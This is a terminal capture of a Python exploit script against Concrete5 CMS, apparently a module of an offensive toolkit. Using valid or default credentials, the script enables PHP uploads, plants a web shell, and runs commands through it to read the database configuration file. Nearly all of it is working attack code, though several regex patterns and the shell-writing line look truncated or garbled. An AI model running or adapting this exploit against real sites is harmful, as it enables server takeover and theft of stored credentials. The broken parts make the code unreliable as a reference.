c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py #!/usr/bin/env python # shell-concrete5.py - module based on previous version # created 29.04.2017. Bug ('feature') is exploitable only # when you will have a valid credentials. import sys import re import requests target = raw_input("[+] Hostname> ") logMe = target + '/index.php/login' session = requests.session() initreq = session.get(logMe) initresp = initreq.text gettoken = re.compile('') found = re.search(gettoken, initresp) if found: token = found.group(1) print '[+] Found token: ' + str(token) # assuming token is valid, let's log in login_data = { 'uName':'user', 'uPassword':'bitnami', 'ccm_token':token } loglink = target + '/index.php/login/authenticate/concrete' loginreq = session.post(loglink, data=login_data) #afterlogin = target + '/index.php/dashboard/system' afterlogin = target + '/index.php/dashboard/system/files/filetypes' nextreq1 = session.get(afterlogin) nextresp1 = nextreq1.text print '[+] Cool, we\'re logged-in!' #print afterlogin #print nextresp1 print '[+] We are ready to go, extension-page is available.' print '' # construct POST with new.ext newToken = re.compile('') foundToken = re.search(newToken, nextresp1) if foundToken: newOne = foundToken.group(1) print '[+] New token grabbed: ' + str(newOne) data_ext = { 'ccm_token':newOne, 'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone' } datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions' datareq = session.post(datalink, data=data_ext) dataresp = datareq.text nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)') newexts = re.search(nowwecan, dataresp) if newexts: print '[+] Available now: '+ newexts.group(1) print '[+] Time to upload shell...' # next token to upload request nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0' tokreq3 = session.get(nextTokenUrl) tokresp3 = tokreq3.text grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>') foundit = re.search(grabNextTok, tokresp3) if foundit: tokentoup = foundit.group(1) print '[+] Next token (3rd): ' + str( tokentoup ) # we are logged-in; preparing req to upload shell saymyname = 'meshell3.php' fp = open(saymyname,'w') fp.write('' whereareu = re.compile(whereareutxt) foundme2 = re.search(whereareu, prepresp) if foundme2: print '[+] Shell is ready to use:' shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id' print ' ' + shellshere print '[+] "Finish him!" ;7' finish = session.get(shellshere) fintxt = finish.text print '[+] Response:' print fintxt print '\n---------------' else: print '[-] I can not upload our shell. Verify!'